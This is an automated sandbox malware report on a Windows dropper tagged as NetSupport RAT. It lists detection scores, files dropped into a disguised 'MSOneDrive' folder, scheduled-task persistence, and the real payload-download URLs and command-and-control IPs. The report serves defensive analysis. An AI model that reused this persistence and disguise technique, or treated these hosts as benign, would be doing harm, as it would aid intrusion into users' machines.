                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1514955 Sample: SecuriteInfo.com.Win32.Drop... Startdate: 21/09/2024 Architecture: WINDOWS Score: 80 31 armayalitim.com 2->31 33 mlm-cdn.com 2->33 35 2 other IPs or domains 2->35 47 Suricata IDS alerts for network traffic 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Machine Learning detection for sample 2->51 53 AI detected suspicious sample 2->53 8 SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe 48 2->8         started        13 client32.exe 2->13         started        signatures3 process4 dnsIp5 37 mlm-cdn.com 142.11.212.184, 443, 49700, 49701 HOSTWINDSUS United States 8->37 23 C:\Users\user\AppData\Local\...\wfapigp.dll, PE32 8->23 dropped 25 C:\Users\user\AppData\...\remcmdstub.exe, PE32 8->25 dropped 27 C:\Users\user\AppData\Local\...\pcicapi.dll, PE32 8->27 dropped 29 22 other files (2 malicious) 8->29 dropped 55 Found evasive API chain (may stop execution after checking mutex) 8->55 57 Uses schtasks.exe or at.exe to add and modify task schedules 8->57 15 client32.exe 17 8->15         started        19 schtasks.exe 1 8->19         started        file6 signatures7 process8 dnsIp9 39 armayalitim.com 37.1.209.225, 443, 49704, 63016 HVC-ASUS Ukraine 15->39 41 geo.netsupportsoftware.com 172.67.68.212, 49705, 80 CLOUDFLARENETUS United States 15->41 43 Contains functionalty to change the wallpaper 15->43 45 Delayed program exit found 15->45 21 conhost.exe 19->21         started        signatures10 process11

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe68%ReversingLabsWin32.Trojan.Madokwa
                                SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe55%VirustotalBrowse
                                SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\HTCTL32.DLL4%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\PCICHEK.DLL2%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLL0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLL7%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\UIManagerBrokerps.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\WerEnc.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\client32.exe12%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\dpnathlp.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\dpnhupnp.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\dpnlobby.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\dxmasf.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\getuname.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\icmp.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\ir41_qcx.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\ir50_32.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\msvcp140_codecvt_ids.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\msvcr100.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\msvcr100_clr0400.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\pcicapi.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\remcmdstub.exe0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\wfapigp.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\wiatrace.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\winrsmgr.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\MSOneDrive\winrssrv.dll0%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                SourceDetectionScannerLabelLink
                                geo.netsupportsoftware.com4%VirustotalBrowse
                                mlm-cdn.com1%VirustotalBrowse
                                armayalitim.com0%VirustotalBrowse

                                URLs

                                SourceDetectionScannerLabelLink
                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                                http://ocsp.sectigo.com00%URL Reputationsafe
                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                                http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                                https://sectigo.com/CPS00%URL Reputationsafe
                                http://ocsp.thawte.com00%URL Reputationsafe
                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
                                http://geo.netsupportsoftware.com/location/loca.asp0%Avira URL Cloudsafe
                                http://www.netsupportsoftware.com0%Avira URL Cloudsafe
                                http://%s/testpage.htmwininet.dll0%Avira URL Cloudsafe
                                http://www.netsupportschool.com/tutor-assistant.asp1180%Avira URL Cloudsafe
                                http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)0%Avira URL Cloudsafe
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                                http://www.pci.co.uk/supportsupport0%Avira URL Cloudsafe
                                https://mlm-cdn.com/ssd/sdn4.zip2%localappdata%/MSOneDrive0%Avira URL Cloudsafe
                                http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)0%VirustotalBrowse
                                http://127.0.0.1RESUMEPRINTING0%Avira URL Cloudsafe
                                http://geo.netsupportsoftware.com/location/loca.aspO0%Avira URL Cloudsafe
                                http://www.netsupportsoftware.com1%VirustotalBrowse
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                https://mlm-cdn.com/ssd/sdn4.zip2%localappdata%/MSOneDrive1%VirustotalBrowse
                                http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r0%Avira URL Cloudsafe
                                http://www.netsupportschool.com/tutor-assistant.asp1180%VirustotalBrowse
                                https://mlm-cdn.com/ssd/sdn1.zip0%Avira URL Cloudsafe
                                http://geo.netsupportsoftware.com/location/loca.aspO0%VirustotalBrowse
                                http://geo.netsupportsoftware.com/location/loca.aspT0%Avira URL Cloudsafe
                                http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r0%VirustotalBrowse
                                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%Avira URL Cloudsafe
                                http://www.pci.co.uk/supportsupport0%VirustotalBrowse
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                https://mlm-cdn.com/ssd/sdn1.zipl0%Avira URL Cloudsafe
                                http://crl.microso0%Avira URL Cloudsafe
                                http://geo.netsupportsoftware.com/location/loca.aspT0%VirustotalBrowse
                                https://sectigo.com/CPS0B0%Avira URL Cloudsafe
                                http://geo.netsupportsoftware.com/location/loca.asp4%VirustotalBrowse
                                https://sectigo.com/CPS0C0%Avira URL Cloudsafe
                                https://mlm-cdn.com/10%Avira URL Cloudsafe
                                https://sectigo.com/CPS0D0%Avira URL Cloudsafe
                                https://sectigo.com/CPS0C0%VirustotalBrowse
                                http://www.netsupportschool.com/tutor-assistant.asp0%Avira URL Cloudsafe
                                https://sectigo.com/CPS0B0%VirustotalBrowse
                                https://mlm-cdn.com/ssd/sdn1.zip1%VirustotalBrowse
                                http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#0%Avira URL Cloudsafe
                                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%VirustotalBrowse
                                https://mlm-cdn.com/ssd/sdn2.zip2a0%Avira URL Cloudsafe
                                https://sectigo.com/CPS0D0%VirustotalBrowse
                                https://mlm-cdn.com/0%Avira URL Cloudsafe
                                http://www.pci.co.uk/support0%Avira URL Cloudsafe
                                http://www.crossteccorp.com0%Avira URL Cloudsafe
                                http://www.netsupportschool.com/tutor-assistant.asp0%VirustotalBrowse
                                http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#0%VirustotalBrowse
                                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%Avira URL Cloudsafe
                                https://mlm-cdn.com/1%VirustotalBrowse
                                https://mlm-cdn.com/ssd/sdn4.zip0%Avira URL Cloudsafe
                                http://127.0.0.10%Avira URL Cloudsafe
                                http://www.pci.co.uk/support0%VirustotalBrowse
                                https://mlm-cdn.com/ssd/sdn4.zipj0%Avira URL Cloudsafe
                                http://www.symauth.com/cps0(0%Avira URL Cloudsafe
                                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%VirustotalBrowse
                                http://geo.netsupportsoftware.com/0%Avira URL Cloudsafe
                                http://37.1.209.225/fakeurl.htm0%Avira URL Cloudsafe
                                http://127.0.0.11%VirustotalBrowse
                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%Avira URL Cloudsafe
                                http://www.symauth.com/cps0(0%VirustotalBrowse
                                https://mlm-cdn.com/ssd/sdn3.zip0%Avira URL Cloudsafe
                                https://mlm-cdn.com/ssd/sdn4.zip1%VirustotalBrowse
                                http://www.symauth.com/rpa000%Avira URL Cloudsafe
                                https://mlm-cdn.com/ssd/sdn4.zipom/ssd/sdn3.zipe4$0%Avira URL Cloudsafe
                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%Avira URL Cloudsafe
                                http://www.crossteccorp.com0%VirustotalBrowse
                                https://mlm-cdn.com/k0%Avira URL Cloudsafe
                                https://mlm-cdn.com/ssd/sdn2.zip0%Avira URL Cloudsafe
                                https://mlm-cdn.com/ssd/sdn4.zipL0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		172.67.68.212
                                		truefalseunknown
                                mlm-cdn.com
                                		142.11.212.184
                                		truefalseunknown
                                armayalitim.com
                                		37.1.209.225
                                		truetrueunknown
                                armayalitim1722.com
                                		unknown
                                		unknownfalse
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://geo.netsupportsoftware.com/location/loca.aspfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/ssd/sdn1.zipfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/ssd/sdn4.zipfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://37.1.209.225/fakeurl.htmtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/ssd/sdn3.zipfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/ssd/sdn2.zipfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.netsupportsoftware.comPCICL32.DLL.3.drfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://%s/testpage.htmwininet.dllclient32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.netsupportschool.com/tutor-assistant.asp118client32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://ocsp.sectigo.com0remcmdstub.exe.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.pci.co.uk/supportsupportclient32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/ssd/sdn4.zip2%localappdata%/MSOneDriveSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://127.0.0.1RESUMEPRINTINGclient32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://geo.netsupportsoftware.com/location/loca.aspOclient32.exe, 0000000B.00000002.3743777363.00000000010C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://%s/testpage.htmclient32.exe, client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0rremcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://geo.netsupportsoftware.com/location/loca.aspTclient32.exe, 0000000B.00000002.3743777363.0000000001146000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000003.1671103639.0000000001146000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#pcicapi.dll.3.dr, remcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://%s/fakeurl.htmclient32.exe, client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/ssd/sdn1.ziplSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1318840314.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.thawte.com/ThawteTimestampingCA.crl0SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://crl.microsoSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1372124884.00000000037A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://sectigo.com/CPS0Bremcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://sectigo.com/CPS0Cpcicapi.dll.3.dr, remcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://sectigo.com/CPS0DSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr, remcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/1SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#remcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/ssd/sdn2.zip2aSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.pci.co.uk/supportclient32.exe, 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://sectigo.com/CPS0SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.crossteccorp.comSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://ocsp.thawte.com0SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0spcicapi.dll.3.dr, remcmdstub.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://127.0.0.1client32.exe, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/ssd/sdn4.zipjSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.symauth.com/cps0(SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://geo.netsupportsoftware.com/client32.exe, 0000000B.00000003.1671103639.0000000001162000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.3746392967.0000000001162000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr, remcmdstub.exe.3.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ySecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.symauth.com/rpa00SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.3.dr, client32.exe.3.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/ssd/sdn4.zipom/ssd/sdn3.zipe4$SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr, remcmdstub.exe.3.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/kSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://mlm-cdn.com/ssd/sdn4.zipJSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://mlm-cdn.com/ssd/sdn4.zipLSecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368040624.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.11.212.184
                                    		mlm-cdn.comUnited States
                                    		54290HOSTWINDSUSfalse
                                    172.67.68.212
                                    		geo.netsupportsoftware.comUnited States
                                    		13335CLOUDFLARENETUSfalse
                                    37.1.209.225
                                    		armayalitim.comUkraine
                                    		29802HVC-ASUStrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1514955
                                    Start date and time:2024-09-21 14:44:32 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 57s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:19
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                    Detection:MAL
                                    Classification:mal80.rans.evad.winEXE@7/34@10/3
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 79%
                                    • Number of executed functions: 120
                                    • Number of non-executed functions: 192
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    10:03:10API Interceptor10901831x Sleep call for process: client32.exe modified
                                    14:45:40Task SchedulerRun new task: MSOneDrive path: C:\Users\user\AppData\Local/MSOneDrive\client32.exe

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    142.11.212.184SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                      SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                        SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          172.67.68.212SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • geo.netsupportsoftware.com/location/loca.asp
                                          8hN4C25a0O.exeGet hashmaliciousNetSupport RATBrowse
                                          • geo.netsupportsoftware.com/location/loca.asp
                                          FakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                                          • geo.netsupportsoftware.com/location/loca.asp
                                          JbZaDxFXF3.exeGet hashmaliciousNetSupport RATBrowse
                                          • geo.netsupportsoftware.com/location/loca.asp
                                          file.exeGet hashmaliciousNetSupport RAT, LummaC Stealer, NetSupport DownloaderBrowse
                                          • geo.netsupportsoftware.com/location/loca.asp
                                          MDE_File_Sample_fb7baecc9f46e01492b4e3e6409d6c73f83a1169.zipGet hashmaliciousNetSupport RATBrowse
                                          • geo.netsupportsoftware.com/location/loca.asp
